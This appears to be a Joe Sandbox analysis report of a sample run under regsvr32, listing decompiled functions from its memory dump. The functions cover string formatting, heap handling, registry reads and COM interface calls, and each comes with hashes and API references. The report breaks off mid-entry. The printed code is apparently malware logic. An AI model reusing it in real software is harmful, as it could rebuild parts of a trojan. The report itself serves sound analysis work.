Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 48ad64bcc35b09318d7bcabc42021f22867d5a8a822087b0dbac1eb9429a090c
Instruction ID: 6980b10d920421efa25a8bf4c77df52342f458187a9e2de80f62e51ff71a23ec
Opcode Fuzzy Hash: 48ad64bcc35b09318d7bcabc42021f22867d5a8a822087b0dbac1eb9429a090c
Instruction Fuzzy Hash: 03316D31A0010DBFDB11EBA1DD85EEA7BB8FB88704F5402A5B504A7161D7B95E04FF61

Uniqueness

Uniqueness Score: -1.00%

Function 00FB5F9A, Relevance: 4.6, APIs: 3, Instructions: 82
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00FB5F9A(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				long _t29;
				intOrPtr _t33;
				intOrPtr* _t41;
				void* _t42;
				void* _t46;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr _t50;

				_t46 = __edx;
				_t42 = __ecx;
				_t41 = _a16;
				_t47 = __eax;
				_t22 =  *0xfba2d4; // 0x477d5a8
				_t2 = _t22 + 0xfbb662; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t41);
				if( *0xfba2a4 >= 5) {
					_push( &_a16);
					_push( &_v8);
					_push( &_v48);
					_t29 = _a4;
					"QQSUVWh"();
					L5:
					_a4 = _t29;
					L6:
					if(_a4 != 0) {
						L9:
						 *0xfba2a4 =  *0xfba2a4 + 1;
						L10:
						return _a4;
					}
					_t49 = _a16;
					 *_t47 = _a16;
					_t48 = _v8;
					 *_t41 = E00FB283A(_t49, _t48); // executed
					_t33 = E00FB738C(_t48, _t49); // executed
					if(_t33 != 0) {
						 *_a8 = _t48;
						 *_a12 = _t33;
						if( *0xfba2a4 < 5) {
							 *0xfba2a4 =  *0xfba2a4 & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E00FB1492();
					HeapFree( *0xfba290, 0, _t48);
					goto L9;
				}
				_t50 =  *0xfba390; // 0x5738d5d
				if(RtlAllocateHeap( *0xfba290, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t29 = E00FB46D1(_a4, _t42, _t46, _t50,  &_v48,  &_v8,  &_a16, _t36); // executed
				goto L5;
			}

0x00fb5f9a
0x00fb5f9a
0x00fb5fa1
0x00fb5fa8
0x00fb5fac
0x00fb5fb1
0x00fb5fbc
0x00fb5fcc
0x00fb600f
0x00fb6013
0x00fb6017
0x00fb6018
0x00fb601b
0x00fb6020
0x00fb6020
0x00fb6023
0x00fb6027
0x00fb6061
0x00fb6061
0x00fb6067
0x00fb606e
0x00fb606e
0x00fb6029
0x00fb602c
0x00fb602e
0x00fb603b
0x00fb603d
0x00fb6044
0x00fb607b
0x00fb6080
0x00fb6082
0x00fb6084
0x00fb6084
0x00000000
0x00fb6082
0x00fb6046
0x00fb604d
0x00fb605b
0x00000000
0x00fb605b
0x00fb5fce
0x00fb5fe9
0x00fb6003
0x00000000
0x00fb6003
0x00fb5ffc
0x00000000

APIs

wsprintfA.USER32 ref: 00FB5FBC
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00FB5FE1

Part of subcall function 00FB46D1: GetTickCount.KERNEL32 ref: 00FB46E8
Part of subcall function 00FB46D1: wsprintfA.USER32 ref: 00FB4735
Part of subcall function 00FB46D1: wsprintfA.USER32 ref: 00FB4752
Part of subcall function 00FB46D1: wsprintfA.USER32 ref: 00FB4772
Part of subcall function 00FB46D1: wsprintfA.USER32 ref: 00FB4790
Part of subcall function 00FB46D1: wsprintfA.USER32 ref: 00FB47B3
Part of subcall function 00FB46D1: wsprintfA.USER32 ref: 00FB47D4

HeapFree.KERNEL32(00000000,00FB20FA,?,?,00FB20FA,?), ref: 00FB605B

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: wsprintf$Heap$AllocateCountFreeTick
String ID:
API String ID: 2794511967-0
Opcode ID: a33c7664f08c76516d3331cf24c8723e1db6cb4190610537cbb091322bd87770
Instruction ID: 2097f9c64e5ede8c05b23361c3bc7c54d0c3da65412e4c7df942037975ea0c49
Opcode Fuzzy Hash: a33c7664f08c76516d3331cf24c8723e1db6cb4190610537cbb091322bd87770
Instruction Fuzzy Hash: 99313872500209EFCB01EF66DD84ADA3BB8FF08390F144122F905E7251D7799954EFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00FB2F68, Relevance: 4.6, APIs: 3, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00FB2F68(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t33;
				void* _t38;
				void* _t45;
				char* _t46;
				void* _t48;
				char* _t56;
				char* _t57;
				intOrPtr _t59;
				void* _t60;

				_t56 = _a4;
				_t60 = __eax;
				_v12 = 0xb;
				if(_t56 != 0 && __eax != 0) {
					_t5 = _t60 - 1; // -1
					_t46 =  &(_t56[_t5]);
					_t28 =  *_t46;
					_v5 = _t28;
					 *_t46 = 0;
					__imp__(_a8, _t45);
					_v16 = _t28;
					_t57 = StrStrA(_t56, _a8);
					if(_t57 != 0) {
						 *_t46 = _v5;
						_t33 = RtlAllocateHeap( *0xfba290, 0, _a16 + _t60); // executed
						_t48 = _t33;
						if(_t48 == 0) {
							_v12 = 8;
						} else {
							_t58 = _t57 - _a4;
							E00FB77A4(_t57 - _a4, _a4, _t48);
							_t38 = E00FB77A4(_a16, _a12, _t58 + _t48);
							_t53 = _v16;
							_t59 = _a16;
							E00FB77A4(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
							 *_a20 = _t48;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t60 - _v16 + _t59;
						}
					}
				}
				return _v12;
			}

0x00fb2f70
0x00fb2f75
0x00fb2f77
0x00fb2f7e
0x00fb2f90
0x00fb2f90
0x00fb2f94
0x00fb2f96
0x00fb2f99
0x00fb2f9c
0x00fb2fa5
0x00fb2faf
0x00fb2fb3
0x00fb2fb8
0x00fb2fc8
0x00fb2fce
0x00fb2fd2
0x00fb3021
0x00fb2fd4
0x00fb2fd4
0x00fb2fdd
0x00fb2fec
0x00fb2ff1
0x00fb2ffe
0x00fb3007
0x00fb3012
0x00fb3019
0x00fb301d
0x00fb301d
0x00fb2fd2
0x00fb3028
0x00fb302f

APIs

lstrlen.KERNEL32(74B5F710,?,00000000,?,74B5F710), ref: 00FB2F9C
StrStrA.SHLWAPI(00000000,?), ref: 00FB2FA9
RtlAllocateHeap.NTDLL(00000000,?), ref: 00FB2FC8

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: AllocateHeaplstrlen
String ID:
API String ID: 556738718-0
Opcode ID: f50ceee8d579e79d2d712259c649b5b2d31d3e4e7cfe2b11763625572890a2e4
Instruction ID: 6072749e91b4307e215e55e8bd8f64dae562895a24ce9d63a8a5ec47efe4fe02
Opcode Fuzzy Hash: f50ceee8d579e79d2d712259c649b5b2d31d3e4e7cfe2b11763625572890a2e4
Instruction Fuzzy Hash: 8421693AA04249AFCB01EF69CC84BDEBFB5EF85354F188154E804AB315C635EA15DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FB71A5, Relevance: 4.6, APIs: 3, Instructions: 54
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FB71A5(void* __ecx, void* __eflags) {
				char _v8;
				void* _v12;
				int _v16;
				int _v20;
				intOrPtr _t15;
				intOrPtr _t19;
				long _t24;
				long _t29;
				short* _t31;
				short* _t34;

				_t15 =  *0xfba2d4; // 0x477d5a8
				_v8 = _v8 & 0x00000000;
				_t3 = _t15 + 0xfbba30; // 0x4f0053
				_v16 = 4;
				_t31 = E00FB3875(__ecx, _t3);
				if(_t31 != 0) {
					_t19 =  *0xfba2d4; // 0x477d5a8
					_t5 = _t19 + 0xfbba8c; // 0x6e0049
					_t34 = E00FB3875(__ecx, _t5);
					if(_t34 != 0) {
						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
						if(_t24 == 0) {
							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
							if(_t29 != 0) {
								_v8 = _v8 & 0x00000000;
							}
							RegCloseKey(_v12);
						}
						E00FB50CA(_t34);
					}
					E00FB50CA(_t31);
				}
				return _v8;
			}

0x00fb71ab
0x00fb71b0
0x00fb71b5
0x00fb71bc
0x00fb71c8
0x00fb71cc
0x00fb71ce
0x00fb71d4
0x00fb71e0
0x00fb71e4
0x00fb71f7
0x00fb71ff
0x00fb7213
0x00fb721b
0x00fb721d
0x00fb721d
0x00fb7224
0x00fb7224
0x00fb722b
0x00fb722b
0x00fb7231
0x00fb7236
0x00fb723c

APIs

Part of subcall function 00FB3875: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00FB71C8,004F0053,00000000,?), ref: 00FB387E
Part of subcall function 00FB3875: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00FB71C8,004F0053,00000000,?), ref: 00FB38A8
Part of subcall function 00FB3875: memset.NTDLL ref: 00FB38BC

RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 00FB71F7
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 00FB7213
RegCloseKey.ADVAPI32(00000000), ref: 00FB7224

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: CloseOpenQueryValuelstrlenmemcpymemset
String ID:
API String ID: 830012212-0
Opcode ID: 5029ddf25398f7ff772f4edc2ace064083c4bd37d990842db0e99ac2c01b0b58
Instruction ID: 50d07e83d7ea9cbd8985c939148727e47a4ee70ca7b532c1ead7403a34c91161
Opcode Fuzzy Hash: 5029ddf25398f7ff772f4edc2ace064083c4bd37d990842db0e99ac2c01b0b58
Instruction Fuzzy Hash: CD110972A00209FFDB11EBD5DC85FEE77BCAB44740F140199B611A7151EB78EA04AF61

Uniqueness

Uniqueness Score: -1.00%

Function 00FB181D, Relevance: 3.8, APIs: 3, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FB181D(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				void* _t35;
				signed int _t38;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x110;
				_v12 = 0x110;
				_t24 = E00FB6837(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0xfba324, 0x110);
					_t27 =  *0xfba328; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						_t51 = _a4;
						E00FB5F68(0x110, _a4, _t27, 0);
					}
					if(E00FB2BB0( &_v36) != 0) {
						_t35 = E00FB39C5(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
						if(_t35 == 0) {
							_t55 = _v20;
							_v36 =  *_t46;
							_t38 = E00FB2BE3(_t55, _a8, _t51, _t46, _a12); // executed
							_v16 = _t38;
							 *(_t55 + 4) = _v36;
							_t20 =  &(_t46[4]); // 0x8b4875fc
							memset(_t55, 0, _v12 - ( *_t20 & 0xf));
							_t57 = _t57 + 0xc;
							E00FB50CA(_t55);
						}
					}
					memset(_a4, 0, _t53);
					E00FB50CA(_a4);
				}
				return _v16;
			}

0x00fb1823
0x00fb1828
0x00fb1835
0x00fb1838
0x00fb183b
0x00fb1842
0x00fb1845
0x00fb1853
0x00fb1858
0x00fb185d
0x00fb1862
0x00fb1864
0x00fb186c
0x00fb186c
0x00fb187b
0x00fb1890
0x00fb1897
0x00fb189e
0x00fb18a4
0x00fb18aa
0x00fb18b2
0x00fb18b8
0x00fb18bb
0x00fb18c8
0x00fb18cd
0x00fb18d1
0x00fb18d1
0x00fb1897
0x00fb18dc
0x00fb18e7
0x00fb18e7
0x00fb18f3

APIs

Part of subcall function 00FB6837: RtlAllocateHeap.NTDLL(00000000,00000000,00FB4197), ref: 00FB6843

memcpy.NTDLL(00000000,00000110,00FB20FA,00FB20FA,?,?,00FB20FA,?,?,00FB6042,?), ref: 00FB1853
memset.NTDLL ref: 00FB18C8
memset.NTDLL ref: 00FB18DC

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: memset$AllocateHeapmemcpy
String ID:
API String ID: 1529149438-0
Opcode ID: 8ac38ff7e0f21f6e273b1322d8e5fdb7cc5357029ca87b8df66fefb1fe05123f
Instruction ID: c4b670ef37b3e0de2926cc1697a9f4e8e362ba4f27f3b097409d842a15dba2f8
Opcode Fuzzy Hash: 8ac38ff7e0f21f6e273b1322d8e5fdb7cc5357029ca87b8df66fefb1fe05123f
Instruction Fuzzy Hash: AB211D75A00218ABDB11AFA6CC41BEEBBB8BF09750F044015F904E7251D738DA05EFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00FB1206, Relevance: 3.1, APIs: 2, Instructions: 147
serviceCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E00FB1206(intOrPtr _a4) {
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				void* _v46;
				short _v48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t53;
				intOrPtr _t56;
				void* _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr _t76;
				intOrPtr* _t79;
				short _t81;
				char* _t97;
				intOrPtr _t99;
				void* _t105;
				void* _t107;
				intOrPtr _t111;

				_t81 = 0;
				_v48 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t49 =  *0xfba2d4; // 0x477d5a8
				_t4 = _t49 + 0xfbb418; // 0x57389c0
				_t5 = _t49 + 0xfbb408; // 0x9ba05972
				_t51 =  *0xfba140(_t5, 0, 4, _t4,  &_v20); // executed
				_t105 = _t51;
				if(_t105 >= 0) {
					_t53 = _v20;
					_push( &_v12);
					_push(1);
					_push( &_v32);
					_push(8);
					_t97 =  &_v48;
					_push(_t97);
					_push(_t97);
					_push(_t53); // executed
					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
						_t56 =  *0xfba2d4; // 0x477d5a8
						_t30 = _t56 + 0xfbb3f8; // 0x57389a0
						_t31 = _t56 + 0xfbb428; // 0x4c96be40
						_t58 =  *0xfba114(_v12, _t31, _t30,  &_v24); // executed
						_t105 = _t58;
						_t59 = _v12;
						 *((intOrPtr*)( *_t59 + 8))(_t59);
						goto L11;
					} else {
						_t71 = _v20;
						_v16 = 0;
						_t105 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
						if(_t105 >= 0) {
							_t111 = _v16;
							if(_t111 == 0) {
								_t105 = 0x80004005;
								goto L11;
							} else {
								if(_t111 <= 0) {
									L11:
									if(_t105 >= 0) {
										goto L12;
									}
								} else {
									do {
										_t73 = _v20;
										_v48 = 3;
										_v40 = _t81;
										_t107 = _t107 - 0x10;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t105 =  *((intOrPtr*)( *_t73 + 0x20))(_t73,  &_v12);
										if(_t105 < 0) {
											goto L7;
										} else {
											_t76 =  *0xfba2d4; // 0x477d5a8
											_t23 = _t76 + 0xfbb3f8; // 0x57389a0
											_t24 = _t76 + 0xfbb428; // 0x4c96be40
											_t105 =  *0xfba114(_v12, _t24, _t23,  &_v24);
											_t79 = _v12;
											 *((intOrPtr*)( *_t79 + 8))(_t79);
											if(_t105 >= 0) {
												L12:
												_t63 = _v24;
												_t105 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
												if(_t105 >= 0) {
													_t99 =  *0xfba2d4; // 0x477d5a8
													_t67 = _v28;
													_t40 = _t99 + 0xfbb3e8; // 0x214e3
													_t105 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
													_t69 = _v28;
													 *((intOrPtr*)( *_t69 + 8))(_t69);
												}
												_t65 = _v24;
												 *((intOrPtr*)( *_t65 + 8))(_t65);
											} else {
												goto L7;
											}
										}
										goto L15;
										L7:
										_t81 = _t81 + 1;
									} while (_t81 < _v16);
									goto L11;
								}
							}
						}
					}
					L15:
					_t61 = _v20;
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				return _t105;
			}

0x00fb1211
0x00fb1213
0x00fb121a
0x00fb121b
0x00fb121c
0x00fb121d
0x00fb1223
0x00fb1228
0x00fb1232
0x00fb1239
0x00fb123f
0x00fb1243
0x00fb1249
0x00fb1251
0x00fb1252
0x00fb1257
0x00fb1258
0x00fb125a
0x00fb125d
0x00fb125e
0x00fb125f
0x00fb1265
0x00fb12fa
0x00fb12ff
0x00fb1306
0x00fb1310
0x00fb1316
0x00fb1318
0x00fb131e
0x00000000
0x00fb126b
0x00fb126b
0x00fb1272
0x00fb127b
0x00fb127f
0x00fb1285
0x00fb1288
0x00fb12ef
0x00000000
0x00fb128a
0x00fb128a
0x00fb1321
0x00fb1323
0x00000000
0x00000000
0x00fb1290
0x00fb1290
0x00fb1290
0x00fb1297
0x00fb129d
0x00fb12a2
0x00fb12aa
0x00fb12ab
0x00fb12ac
0x00fb12ae
0x00fb12b2
0x00fb12b6
0x00000000
0x00fb12b8
0x00fb12bc
0x00fb12c1
0x00fb12c8
0x00fb12d8
0x00fb12da
0x00fb12e0
0x00fb12e5
0x00fb1325
0x00fb1325
0x00fb1332
0x00fb1336
0x00fb133b
0x00fb1341
0x00fb1346
0x00fb1350
0x00fb1352
0x00fb1358
0x00fb1358
0x00fb135b
0x00fb1361
0x00000000
0x00000000
0x00000000
0x00fb12e5
0x00000000
0x00fb12e7
0x00fb12e7
0x00fb12e8
0x00000000
0x00fb12ed
0x00fb128a
0x00fb1288
0x00fb127f
0x00fb1364
0x00fb1364
0x00fb136a
0x00fb136a
0x00fb1373

APIs

IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,057389A0,00FB2932,?,?,?,?,?,?,?,?,?,?,?,00FB2932), ref: 00FB12D2
IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,057389A0,00FB2932,?,?,?,?,?,?,?,00FB2932,00000000,00000000,00000000,006D0063), ref: 00FB1310

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: QueryServiceUnknown_
String ID:
API String ID: 2042360610-0
Opcode ID: b904a16193bb7f6c2f7421451b1cc27324f2de16019590d4e3d6c79814cf5723
Instruction ID: 7f35cfd0a5562d446553e633f0f4943a7143a498a9c5f43af0fe94ef1776a8ab
Opcode Fuzzy Hash: b904a16193bb7f6c2f7421451b1cc27324f2de16019590d4e3d6c79814cf5723
Instruction Fuzzy Hash: D4514A76E00219AFCB00DFE9C898DEEB7B8FF48710B044598E915EB211D775A941DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FB6872, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00FB6872(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E00FB5C35(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0xfba2d4; // 0x477d5a8
						_t20 = _t68 + 0xfbb1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E00FB37AF(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x00fb6878
0x00fb687b
0x00fb688b
0x00fb6894
0x00fb6898
0x00fb6966
0x00fb696c
0x00fb696c
0x00fb68b2
0x00fb68b7
0x00fb68bb
0x00fb68c1
0x00fb68c6
0x00fb68cd
0x00fb68dc
0x00fb68dc
0x00fb68e0
0x00fb68e2
0x00fb68ee
0x00fb68f9
0x00fb6904
0x00fb6908
0x00fb6912
0x00fb6916
0x00fb6918
0x00fb691d
0x00fb6924
0x00fb6934
0x00fb6934
0x00fb691d
0x00fb6916
0x00fb6936
0x00fb693b
0x00fb6940
0x00fb6940
0x00fb6946
0x00fb694c
0x00fb6951
0x00fb6951
0x00fb6956
0x00fb695b
0x00fb695b
0x00fb6956
0x00fb68e0
0x00fb695d
0x00fb6963
0x00000000

APIs

Part of subcall function 00FB5C35: SysAllocString.OLEAUT32(80000002), ref: 00FB5C8C
Part of subcall function 00FB5C35: SysFreeString.OLEAUT32(00000000), ref: 00FB5CF1

SysFreeString.OLEAUT32(?), ref: 00FB6951
SysFreeString.OLEAUT32(00FB1E05), ref: 00FB695B

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 4d6eb9a57c237cea191d02fbe61fbdc4938de7a782f80757f3b006cb6c073a18
Instruction ID: 70f130c179f60e66f5d503e1ec6771d7d367fd364e44a967a9607754f0e61b52
Opcode Fuzzy Hash: 4d6eb9a57c237cea191d02fbe61fbdc4938de7a782f80757f3b006cb6c073a18
Instruction Fuzzy Hash: D4313772900219AFCB21DF6ACC88CDBBB79EFC97507144658F819DB210E6359D51EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FB43C0, Relevance: 3.1, APIs: 2, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00FB43C0(intOrPtr* __eax, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr* _t32;
				intOrPtr _t42;
				intOrPtr _t45;
				intOrPtr _t48;
				void* _t51;

				_push( &_v16);
				_t42 =  *0xfba2d4; // 0x477d5a8
				_t2 = _t42 + 0xfbb438; // 0x20400
				_push(0);
				_push(__eax);
				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
				if(_t51 >= 0) {
					_t22 = _v16;
					_t45 =  *0xfba2d4; // 0x477d5a8
					_t6 = _t45 + 0xfbb458; // 0xe7a1af80
					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
					_t51 = _t23;
					if(_t51 >= 0) {
						_t26 = _v12;
						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
						if(_t51 >= 0) {
							_t48 =  *0xfba2d4; // 0x477d5a8
							_t30 = _v8;
							_t12 = _t48 + 0xfbb448; // 0xa4c6892c
							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
							_t51 = _t31;
							_t32 = _v8;
							 *((intOrPtr*)( *_t32 + 8))(_t32);
						}
						_t28 = _v12;
						 *((intOrPtr*)( *_t28 + 8))(_t28);
					}
					_t24 = _v16;
					 *((intOrPtr*)( *_t24 + 8))(_t24);
				}
				return _t51;
			}

0x00fb43cc
0x00fb43cd
0x00fb43d3
0x00fb43da
0x00fb43dc
0x00fb43e0
0x00fb43e4
0x00fb43e6
0x00fb43ef
0x00fb43f5
0x00fb43fd
0x00fb43ff
0x00fb4403
0x00fb4405
0x00fb4412
0x00fb4416
0x00fb441b
0x00fb4421
0x00fb4426
0x00fb442e
0x00fb4430
0x00fb4432
0x00fb4438
0x00fb4438
0x00fb443b
0x00fb4441
0x00fb4441
0x00fb4444
0x00fb444a
0x00fb444a
0x00fb4451

APIs

IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 00FB43FD
IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 00FB442E

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

